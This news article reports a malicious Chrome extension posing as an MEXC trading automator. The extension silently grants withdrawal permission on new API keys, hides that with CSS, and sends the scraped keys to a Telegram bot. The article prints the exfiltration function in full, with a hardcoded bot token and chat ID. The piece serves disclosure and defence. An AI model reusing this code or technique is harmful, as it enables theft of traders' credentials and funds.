A malicious Chrome extension named MEXC API Automator is targeting cryptocurrency traders on the MEXC exchange, stealthily stealing API login credentials and enabling unauthorized access to user accounts. The deceptive add-on poses as a legitimate tool for automating trading and API key creation, but in reality, it hijacks newly generated API keys, turning user browser sessions into pathways for full account takeovers.
Researchers at Socket.dev identified the malware, which was listed on the Chrome Web Store with claims of “easy API key creation with trading and withdrawal access” for MEXC. Upon installation, the extension activates when users access MEXC’s API management page, a common area for creating keys for trading bots. The attackers can then silently create powerful API keys, initiate trades, and authorize withdrawals from affected accounts globally.
Infection Mechanism, UI Deception, and Telegram Exfiltration
The MEXC API Automator operates as a Manifest V3 Chrome extension. Its core functionality is embedded in a single content script, `script.js`, which targets the MEXC API user interface. When a victim visits the MEXC API management page, the script injects itself, waits for the page to load, and then automatically selects all permission checkboxes within the API creation form. Crucially, this includes the withdrawal permission, a setting that users would typically need to enable explicitly.
To further deceive users, the extension employs clever UI manipulation. It alters the page’s styling to make the withdrawal option appear disabled, even though the server-side permissions remain active. The script removes the “checked” class from the withdrawal checkbox and uses injected CSS to hide the visual indicator. A MutationObserver is implemented to counteract any attempts by MEXC’s own code to restore the correct class, ensuring the deception persists.
The outcome of this manipulation is that victims believe they are only granting trading permissions. However, when they submit the form, it carries full withdrawal rights. Subsequently, when the MEXC exchange displays the success modal containing the newly generated Access Key and Secret Key, the extension swiftly scrapes both credentials directly from the web page’s DOM. These stolen keys are then transmitted in the background to a hardcoded Telegram bot and chat ID, as evidenced by a simple function within the extension’s code:
function sendKeysToTelegram(apiKey, secretKey) {
const botToken = ‘7534112291:AAF46jJWWo95XsRWkzcPevHW7XNo6cqKG9I’;
const chatId = ‘6526634583’;
fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
method: ‘POST’,
headers: { ‘Content-Type’: ‘application/json’ },
body: JSON.stringify({ chat_id: chatId, text: `API Key: ${apiKey}nSecret Key: ${secretKey}` })
});
}
Because the extension operates within the browser’s sandbox and only accesses page content while communicating over standard HTTPS, its malicious activities are well-camouflaged within normal web traffic. By the time a user realizes that unauthorized trades are being made or funds are missing from their account, the attacker has likely already integrated the stolen API keys into scripts or automated tools capable of draining the account without ever needing the user’s primary login password.
Socket.dev researchers have linked the threat actor behind this operation to the handle “jorjortan142.” Their analysis found that the malicious code only executes within an active MEXC session where the user is already logged in, rendering traditional password theft tactics unnecessary. The extension’s success relies on leveraging the trust users place in browser add-ons and the perceived security of the Chrome Web Store. Instead of focusing on account passwords, the malware targets MEXC API keys, which are often long-lived, reused across different platforms, and monitored less stringently than interactive login sessions.
The ongoing investigation into such sophisticated attacks highlights the persistent threat posed by malicious browser extensions. Users are advised to exercise extreme caution when installing any browser add-on, particularly those granting access to financial platforms or sensitive data. Regularly reviewing browser extension permissions and uninstalling any unnecessary or suspicious add-ons are crucial steps in mitigating these risks. The next steps will likely involve MEXC implementing enhanced security measures to detect and block such malicious extensions, and potentially broader efforts by browser vendors to improve their vetting processes for extensions.